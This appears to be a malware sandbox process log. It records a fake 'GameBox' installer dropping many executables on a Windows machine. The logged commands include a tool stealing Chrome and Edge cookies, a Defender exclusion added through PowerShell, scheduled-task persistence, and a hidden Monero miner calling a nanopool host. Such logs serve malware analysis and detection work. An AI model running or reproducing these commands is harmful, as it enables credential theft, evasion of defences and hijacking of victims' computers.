C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4716 -s 7041⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4716 -s 6721⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\is-7UAAI.tmp\DJCJOECZVtp5ltvQQsObO2H9.tmp"C:\Users\Admin\AppData\Local\Temp\is-7UAAI.tmp\DJCJOECZVtp5ltvQQsObO2H9.tmp" /SL5="$50206,138429,56832,C:\Users\Admin\Documents\DJCJOECZVtp5ltvQQsObO2H9.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-H6E57.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-H6E57.tmp\Setup.exe" /Verysilent2⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\GameBox INC\GameBox\Weather Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Weather Installation.exe" /quiet SILENT=1 AF=715 BF=7153⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Weather Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628400241 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"4⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBox32Bit.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBox32Bit.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"3⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe"3⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe"C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe"3⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe"C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe" -a4⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\8360116.exe"C:\Users\Admin\AppData\Roaming\8360116.exe"4⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6608 -s 24405⤵
- Program crash
-
C:\Users\Admin\AppData\Roaming\1197537.exe"C:\Users\Admin\AppData\Roaming\1197537.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\5463260.exe"C:\Users\Admin\AppData\Roaming\5463260.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\8054769.exe"C:\Users\Admin\AppData\Roaming\8054769.exe"4⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628400241 /qn CAMPAIGN=""710"" " CAMPAIGN="710"4⤵
-
C:\Users\Admin\AppData\Local\Temp\b79de8f8-c625-4e13-81cf-f519955346b0\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\b79de8f8-c625-4e13-81cf-f519955346b0\AdvancedRun.exe" /SpecialRun 4101d8 37881⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\4963167.exe"C:\Users\Admin\AppData\Roaming\4963167.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2984 -s 24762⤵
- Program crash
-
C:\Users\Admin\AppData\Roaming\1063322.exe"C:\Users\Admin\AppData\Roaming\1063322.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-S1BTI.tmp\GameBoxWin32.tmp"C:\Users\Admin\AppData\Local\Temp\is-S1BTI.tmp\GameBoxWin32.tmp" /SL5="$402F4,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-A879D.tmp\Daldoula.exe"C:\Users\Admin\AppData\Local\Temp\is-A879D.tmp\Daldoula.exe" /S /UID=burnerch22⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Windows Media Player\IYNSOJCJPA\ultramediaburner.exe"C:\Program Files\Windows Media Player\IYNSOJCJPA\ultramediaburner.exe" /VERYSILENT3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-T7NHH.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-T7NHH.tmp\ultramediaburner.tmp" /SL5="$702A8,281924,62464,C:\Program Files\Windows Media Player\IYNSOJCJPA\ultramediaburner.exe" /VERYSILENT4⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu5⤵
-
C:\Users\Admin\AppData\Local\Temp\b6-95a11-c99-dcfb0-48764c0718133\Lokajafaha.exe"C:\Users\Admin\AppData\Local\Temp\b6-95a11-c99-dcfb0-48764c0718133\Lokajafaha.exe"3⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\34-e0d3c-c7d-f96ae-f99b46323ecbc\Xofybexazhe.exe"C:\Users\Admin\AppData\Local\Temp\34-e0d3c-c7d-f96ae-f99b46323ecbc\Xofybexazhe.exe"3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nilhnvks.zzk\GcleanerEU.exe /eufive & exit4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\czpbfbdw.3u4\ebook.exe & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\czpbfbdw.3u4\ebook.exeC:\Users\Admin\AppData\Local\Temp\czpbfbdw.3u4\ebook.exe5⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe C:\Users\Admin\AppData\Local\Temp\czpbfbdw.3u4\EBOOKE~1.TMP,S C:\Users\Admin\AppData\Local\Temp\czpbfbdw.3u4\ebook.exe6⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\RUNDLL32.EXEC:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\AppData\Local\Temp\czpbfbdw.3u4\EBOOKE~1.TMP,rl9PWQ==7⤵
- Loads dropped DLL
- Checks processor information in registry
- Modifies system certificate store
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\npaioguv.tb4\installer.exe /qn CAMPAIGN="654" & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\npaioguv.tb4\installer.exeC:\Users\Admin\AppData\Local\Temp\npaioguv.tb4\installer.exe /qn CAMPAIGN="654"5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cbi0cjkw.rdp\JoSetp.exe & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\cbi0cjkw.rdp\JoSetp.exeC:\Users\Admin\AppData\Local\Temp\cbi0cjkw.rdp\JoSetp.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\Chrome4.exe"C:\Users\Admin\AppData\Local\Temp\Chrome4.exe"6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit7⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'8⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"8⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.admin/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BOVf8GOEpqsYJf392VKwN2gwsZ1d06Df9J2hBJw9kUq" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth8⤵
-
C:\Users\Admin\AppData\Local\Temp\JoSetp.exe"C:\Users\Admin\AppData\Local\Temp\JoSetp.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\3336179.exe"C:\Users\Admin\AppData\Roaming\3336179.exe"7⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\6345772.exe"C:\Users\Admin\AppData\Roaming\6345772.exe"7⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 7896 -s 24248⤵
- Program crash
-
C:\Users\Admin\AppData\Roaming\7044040.exe"C:\Users\Admin\AppData\Roaming\7044040.exe"7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zklvgdt5.1nd\md6_6ydj.exe & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\zklvgdt5.1nd\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\zklvgdt5.1nd\md6_6ydj.exe5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0ssq35pp.qpr\ufgaa.exe & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\0ssq35pp.qpr\ufgaa.exeC:\Users\Admin\AppData\Local\Temp\0ssq35pp.qpr\ufgaa.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 7960 -s 16286⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qpg0rani.w5b\anyname.exe & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\qpg0rani.w5b\anyname.exeC:\Users\Admin\AppData\Local\Temp\qpg0rani.w5b\anyname.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\qpg0rani.w5b\anyname.exe"C:\Users\Admin\AppData\Local\Temp\qpg0rani.w5b\anyname.exe" -q6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gu4idmn5.2pa\CHLbrowser.exe & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\gu4idmn5.2pa\CHLbrowser.exeC:\Users\Admin\AppData\Local\Temp\gu4idmn5.2pa\CHLbrowser.exe5⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXEC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zS30D6.tmp\Install.cmd" "7⤵
- Checks computer location settings
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fvd2kjis.1cv\askinstall52.exe & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\fvd2kjis.1cv\askinstall52.exeC:\Users\Admin\AppData\Local\Temp\fvd2kjis.1cv\askinstall52.exe5⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bkhcdovp.pcr\5674d7511aa1fce0a68969dc57375b63.exe & exit4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3u4jwolt.pfr\gcleaner.exe /mixfive & exit4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ppvvcqhq.2vq\112233.exe & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\ppvvcqhq.2vq\112233.exeC:\Users\Admin\AppData\Local\Temp\ppvvcqhq.2vq\112233.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\ppvvcqhq.2vq\112233.exe"C:\Users\Admin\AppData\Local\Temp\ppvvcqhq.2vq\112233.exe"6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\u0bvrqk4.5gv\installer.exe /qn CAMPAIGN=654 & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\u0bvrqk4.5gv\installer.exeC:\Users\Admin\AppData\Local\Temp\u0bvrqk4.5gv\installer.exe /qn CAMPAIGN=6545⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nomzv12d.12e\app.exe /8-2222 & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\nomzv12d.12e\app.exeC:\Users\Admin\AppData\Local\Temp\nomzv12d.12e\app.exe /8-22225⤵
-
C:\Users\Admin\AppData\Local\Temp\nomzv12d.12e\app.exe"C:\Users\Admin\AppData\Local\Temp\nomzv12d.12e\app.exe" /8-22226⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding B703FCC75A274F0E7D502CD093488DDC C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding D2A9B0E82638E895D5F3A0BD33501AB3 C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 88306ACE95FCB106FADCEE8DD5A693F32⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=715 -BF=715 -uncf=default3⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--PIJmcZ4D"4⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exeC:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x1e0,0x1e4,0x1e8,0x1bc,0x1ec,0x7ffd698c9ec0,0x7ffd698c9ed0,0x7ffd698c9ee05⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1632,10755271670404852355,13116881015643983405,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5880_1736630008" --mojo-platform-channel-handle=1724 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1632,10755271670404852355,13116881015643983405,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5880_1736630008" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1664 /prefetch:25⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1632,10755271670404852355,13116881015643983405,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5880_1736630008" --mojo-platform-channel-handle=2032 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1632,10755271670404852355,13116881015643983405,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5880_1736630008" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2388 /prefetch:15⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,10755271670404852355,13116881015643983405,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5880_1736630008" --mojo-platform-channel-handle=2928 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1632,10755271670404852355,13116881015643983405,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5880_1736630008" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2924 /prefetch:25⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,10755271670404852355,13116881015643983405,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5880_1736630008" --mojo-platform-channel-handle=2604 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1632,10755271670404852355,13116881015643983405,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5880_1736630008" --mojo-platform-channel-handle=3192 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,10755271670404852355,13116881015643983405,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5880_1736630008" --mojo-platform-channel-handle=3236 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,10755271670404852355,13116881015643983405,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5880_1736630008" --mojo-platform-channel-handle=3212 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,10755271670404852355,13116881015643983405,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5880_1736630008" --mojo-platform-channel-handle=3224 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,10755271670404852355,13116881015643983405,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5880_1736630008" --mojo-platform-channel-handle=3224 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,10755271670404852355,13116881015643983405,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5880_1736630008" --mojo-platform-channel-handle=3096 /prefetch:85⤵
-
